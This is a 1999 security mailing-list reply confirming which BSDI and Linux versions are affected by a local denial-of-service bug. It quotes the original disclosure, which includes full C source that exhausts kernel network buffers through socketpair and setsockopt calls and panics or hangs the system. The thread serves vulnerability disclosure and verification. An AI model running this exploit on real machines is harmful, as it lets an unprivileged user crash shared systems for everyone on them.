Re: Local DoS on network by unpriviledged user using setsockopt()

[dvorak () CAPU NET (John N Dvorak)]

Sven,

I have verified the following platforms:

BSDI 2.1
BSDI 3.1
BSDI 4.0
BSDI 4.0.1
Cobalt Linux (MIPS) - RedHat based

All vulnerable.

I am testing on other Linux platforms, but I presume all BSD and
Linux-based systems are affected.  I have no resources to test this on
Solaris, AIX, HP and System-V based systems.

I would venture a guess that MacOS X may be vulnerable since I am fairly
sure that most of the socket code is lifted directly from BSD.

JD

On Wed, 1 Sep 1999, Sven Berkvens wrote:

> Recently, I mailed this mailing to a number of people who are concerned
> with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
> mailing was NOT intended to be made public, but somehow it was. Here is
> my original mailing:
>
>
> --- Forwarded ---
>
> I stumbled across a denial of service attack on FreeBSD systems, where
> an unpriviledged user can panic the kernel. Quick and dirty testing
> (code attached at the end of this mail) showed OpenBSD is vulnerable
> too:
>
> FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
> test it on older FreeBSD versions.
>
> OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
> The kernel logs one "/bsd: mb_map full" and all processes trying to send
> something over the network get stuck waiting in mbuf. Locally the system
> continues to function. Tested by a friend.
>
> NetBSD: Not available, but it is highly probable that the affected code
> in OpenBSD is from its parent NetBSD.
>
> As far as I'm concerned, this can be handled quietly and without much
> haste. Knowledge of this problem is limited and there is absolutely no
> intention of publishing this exploit or messages to Bugtraq.
>
> With kind regards,
> Sven Berkvens (sven () ilse nl)
> Long time FreeBSD-system administrator
>
>
>
> The source code for the program that causes this:
>
> #include       <unistd.h>
> #include       <sys/socket.h>
> #include       <fcntl.h>
>
> #define                BUFFERSIZE      204800
>
> extern int
> main(void)
> {
>       int             p[2], i;
>       char            crap[BUFFERSIZE];
>
>       while (1)
>       {
>               if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
>                       break;
>               i = BUFFERSIZE;
>               setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>               setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>               setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>               setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>               fcntl(p[0], F_SETFL, O_NONBLOCK);
>               fcntl(p[1], F_SETFL, O_NONBLOCK);
>               write(p[0], crap, BUFFERSIZE);
>               write(p[1], crap, BUFFERSIZE);
>       }
>       exit(0);
> }
>
> ----- End forwarded message -----

===========================================
John N Dvorak | dvorak () capu net
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================